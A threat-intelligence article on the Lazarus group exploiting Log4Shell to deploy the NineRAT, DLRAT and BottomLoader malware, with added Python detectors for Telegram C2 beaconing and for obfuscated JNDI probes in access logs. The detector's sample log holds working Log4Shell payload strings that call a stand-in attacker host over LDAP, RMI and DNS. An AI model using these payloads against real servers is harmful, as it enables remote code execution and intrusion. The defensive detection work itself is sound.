Lazarus Exploits Log4Shell Vulnerability to Deploy New Trojans


Cybersecurity researchers have warned that the North Korean state-sponsored group Lazarus continues to exploit the Log4Shell vulnerability (CVE-2021-44228), disclosed two years ago. The group is now using the flaw to deploy three previously unknown malware families written in the D programming language (DLang).

According to Cisco Talos, Log4Shell is being used to deliver two remote access trojans, NineRAT and DLRAT, and a loader, BottomLoader. DLang is rarely used for malware, and the researchers believe Lazarus chose it deliberately to evade detection.

This campaign, dubbed Operation Blacksmith, reportedly began around March 2023 and has targeted manufacturing, agricultural, and security companies worldwide.

NineRAT: A New Remote Access Trojan

NineRAT is the first of the two new RATs. It uses the Telegram Bot API as its command-and-control (C2) channel, both to receive commands and to exfiltrate files from compromised machines; routing C2 through a legitimate, widely used service makes the traffic harder to separate from ordinary use of that service. NineRAT includes a dropper component that establishes persistence and launches the main malware binaries.

The malware supports the following commands via Telegram:

  • info — Collect preliminary information about the infected system
  • setmtoken — Set a token value
  • setbtoken — Set a new bot token
  • setinterval — Set the polling interval between requests to the Telegram channel
  • setsleep — Set the period for which the malware lies dormant
  • upgrade — Update to a new version of the implant
  • exit — Terminate the malware
  • uninstall — Remove itself from the system
  • sendfile — Send a file from the infected machine to the C2 server
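The polling behaviour implied by the setinterval and setbtoken commands is something a defender can look for in proxy telemetry. The script below is an added example written for this page, not code from Cisco Talos or from NineRAT itself: it parses constructed proxy log lines (the hosts, timestamps and bot tokens are invented), groups Telegram Bot API requests by client host and bot id, and flags any client that calls getUpdates at a near-constant interval, reporting data-pushing methods seen from the same host alongside. It assumes the proxy records full request URLs, which requires TLS inspection; without that, only the destination api.telegram.org and the request cadence are visible. The thresholds are assumed tuning values.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log lines for this example (hosts, times and bot tokens are
# invented): "<timestamp> <client host> <verb> <url>". host-a polls one bot every
# 30 s and pushes a document to it; the other hosts are noise, including host-d,
# which uses a bot but at irregular intervals.
SAMPLE_PROXY_LOG = """\
2023-12-11T10:00:00Z host-a POST https://api.telegram.org/bot123456:AAHypotheticalToken/getUpdates
2023-12-11T10:00:05Z host-b GET https://www.example.com/index.html
2023-12-11T10:00:30Z host-a POST https://api.telegram.org/bot123456:AAHypotheticalToken/getUpdates
2023-12-11T10:01:00Z host-a POST https://api.telegram.org/bot123456:AAHypotheticalToken/getUpdates
2023-12-11T10:01:30Z host-a POST https://api.telegram.org/bot123456:AAHypotheticalToken/getUpdates
2023-12-11T10:01:35Z host-a POST https://api.telegram.org/bot123456:AAHypotheticalToken/sendDocument
2023-12-11T10:02:00Z host-a POST https://api.telegram.org/bot123456:AAHypotheticalToken/getUpdates
2023-12-11T10:03:00Z host-c GET https://api.telegram.org/bot777:AAOtherToken/getMe
2023-12-11T10:07:00Z host-d POST https://api.telegram.org/bot555:AAChatOps/sendMessage
2023-12-11T10:09:00Z host-d POST https://api.telegram.org/bot555:AAChatOps/getUpdates
2023-12-11T10:19:00Z host-d POST https://api.telegram.org/bot555:AAChatOps/getUpdates
2023-12-11T10:20:00Z host-d POST https://api.telegram.org/bot555:AAChatOps/getUpdates
2023-12-11T10:21:00Z host-d POST https://api.telegram.org/bot555:AAChatOps/getUpdates
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<verb>[A-Z]+) (?P<url>\S+)$")
BOT_RE = re.compile(r"^https?://api\.telegram\.org/bot(?P<token>[^/]+)/(?P<method>\w+)")

# Bot API methods that carry data from the client into the channel (possible exfil).
PUSH_METHODS = {"sendDocument", "sendPhoto", "sendMessage"}


def parse_bot_requests(text):
    """Yield (timestamp, host, api_method, bot_id) for each Telegram Bot API request."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        b = BOT_RE.match(m["url"])
        if not b:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        # A bot token is "<bot id>:<secret>"; keep only the id so a finding can be
        # shared without leaking a credential that is still useful for blocking.
        bot_id = b["token"].split(":", 1)[0]
        yield ts, m["host"], b["method"], bot_id


def find_telegram_beacons(text, min_polls=4, max_jitter=0.2):
    """Return hosts whose getUpdates calls to one bot arrive at a near-constant interval.

    min_polls and max_jitter (population stdev / mean of the gaps) are assumed values.
    """
    polls = defaultdict(list)   # (host, bot_id) -> getUpdates timestamps
    pushes = defaultdict(set)   # (host, bot_id) -> data-pushing methods seen
    for ts, host, method, bot_id in parse_bot_requests(text):
        key = (host, bot_id)
        if method == "getUpdates":
            polls[key].append(ts)
        elif method in PUSH_METHODS:
            pushes[key].add(method)

    findings = []
    for (host, bot_id), stamps in polls.items():
        if len(stamps) < max(min_polls, 2):
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean = statistics.mean(gaps)
        jitter = statistics.pstdev(gaps) / mean if mean else 0.0
        if jitter > max_jitter:
            continue
        findings.append({
            "host": host,
            "bot_id": bot_id,
            "polls": len(stamps),
            "interval_s": round(mean),
            "jitter": round(jitter, 3),
            "pushes": sorted(pushes.get((host, bot_id), ())),
        })
    return findings


if __name__ == "__main__":
    for finding in find_telegram_beacons(SAMPLE_PROXY_LOG):
        print(finding)
```

Legitimate chat-ops bots also poll on a timer, so treat a hit as a triage lead rather than a verdict: pivot to the process on the flagged host that owns the connection, and check whether the bot id is one the organisation knows. The recovered bot id is also the handle for a takedown request.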

DLRAT: Trojan and Loader

The second malware, DLRAT, acts as both a trojan and a loader, allowing Lazarus to deploy additional payloads on compromised systems. DLRAT first executes hardcoded commands to gather system information (such as OS details and MAC address) and sends this data to its C2 server. The server then responds with the victim’s external IP address and one of the following commands:

  • deleteme — Remove the malware using a BAT file
  • download — Download files from a specified remote source
  • rename — Rename files on the infected system
  • iamsleep — Put the malware to sleep for a specified period
  • upload — Upload files to the C2 server
  • showurls — Not yet implemented

BottomLoader: Malware Loader

Cisco analysts also discovered BottomLoader, a loader that retrieves and executes a payload from a hardcoded URL via PowerShell. It persists by placing an entry in the Startup directory, so the payload is launched again at logon. BottomLoader can also transfer files from the infected system to the C2 server, giving the operators additional flexibility.

Attack Details and Impact

The attacks identified by the researchers are linked to the critical Log4Shell vulnerability (CVE-2021-44228). Although more than two years have passed since its disclosure and the release of patches, Log4Shell remains a serious threat because many internet-facing systems are still unpatched.

Lazarus targeted publicly accessible VMware Horizon servers running vulnerable versions of the Log4j library, gaining remote code execution. After compromising a server, the operators deployed a proxy tool for persistent access, ran reconnaissance commands, created new administrator accounts, and used credential-theft tools such as ProcDump and Mimikatz.
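As an added example (not part of the Talos report or of this article), the script below shows the check a defender would run over web-server or reverse-proxy access logs in front of a Horizon or other Java front end. Matching the literal string ${jndi: is not enough, because Log4j evaluates nested lookups before the JNDI one, and attackers use that to hide the trigger. The script URL-decodes each line, unwinds the nested lookup tricks (${lower:j}, ${::-j}, ${env:NaN:-j}) the way Log4j would, and then reports any ${jndi:<scheme>://...} reference with its target. The log lines are constructed for the example, with addresses from documentation ranges.

```python
import re
from urllib.parse import unquote

# Constructed Apache-style access log lines for this example (addresses are from
# documentation ranges). Lines 2-5 carry Log4Shell probes in the User-Agent or
# query string, with increasing levels of obfuscation.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [11/Dec/2023:10:00:00 +0000] "GET /portal/ HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
203.0.113.9 - - [11/Dec/2023:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 1234 "-" "${jndi:ldap://198.51.100.7:1389/a}"
203.0.113.9 - - [11/Dec/2023:10:00:02 +0000] "GET /portal/?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 400 0 "-" "curl/8.0"
203.0.113.9 - - [11/Dec/2023:10:00:03 +0000] "GET /portal/ HTTP/1.1" 200 1234 "-" "${${env:NaN:-j}ndi:${::-r}mi://198.51.100.7:1099/c}"
203.0.113.9 - - [11/Dec/2023:10:00:04 +0000] "GET /portal/?q=%24%7Bjndi%3Adns%3A%2F%2Fcanary.example%2Fd%7D HTTP/1.1" 200 10 "-" "curl/8.0"
"""

# An innermost ${...} lookup: one with no further "${" or "}" inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# What we are ultimately looking for once the obfuscation has been unwound.
JNDI_REF = re.compile(r'\$\{jndi:(?P<scheme>[a-z]+)://(?P<target>[^}\s"]*)', re.IGNORECASE)


def resolve_lookup(body):
    """Evaluate one innermost lookup the way attackers rely on Log4j 2.x doing.

    Handles the ":-default" syntax (${env:NaN:-j}, ${::-j}) and the lower/upper
    lookups. The jndi lookup itself and anything unknown are left in place.
    """
    name, sep, value = body.partition(":")
    if name.lower() == "jndi":
        return None
    if ":-" in body:
        return body.split(":-", 1)[1]
    if sep:
        if name.lower() == "lower":
            return value.lower()
        if name.lower() == "upper":
            return value.upper()
    return None


def normalize_lookups(text, max_rounds=20):
    """Repeatedly collapse innermost lookups until nothing more resolves.

    max_rounds bounds the work on adversarial input with very deep nesting.
    """
    for _ in range(max_rounds):
        changed = False

        def replace(m):
            nonlocal changed
            resolved = resolve_lookup(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(replace, text)
        if not changed:
            break
    return text


def scan_access_log(text):
    """Return one finding per log line that contains a JNDI reference after decoding."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        # Probes arrive URL-encoded in query strings and raw in headers: decode
        # first, then unwind nested lookups, then look for the bare reference.
        decoded = normalize_lookups(unquote(line))
        m = JNDI_REF.search(decoded)
        if m:
            findings.append({
                "line": lineno,
                "scheme": m["scheme"].lower(),
                "target": m["target"],
            })
    return findings


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_ACCESS_LOG):
        print(finding)
```

The recovered scheme and target are the pivot points: the target host is what the vulnerable server would have connected back to, so it belongs on the block list and in a search of outbound connection logs from the Horizon hosts.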

In the second stage, the group deployed NineRAT as described above. Cisco analysts believe Lazarus may be sharing data collected by NineRAT with other groups or activity clusters: the malware sometimes re-fingerprints systems that have already been profiled, which suggests the information is being gathered for more than one consumer.
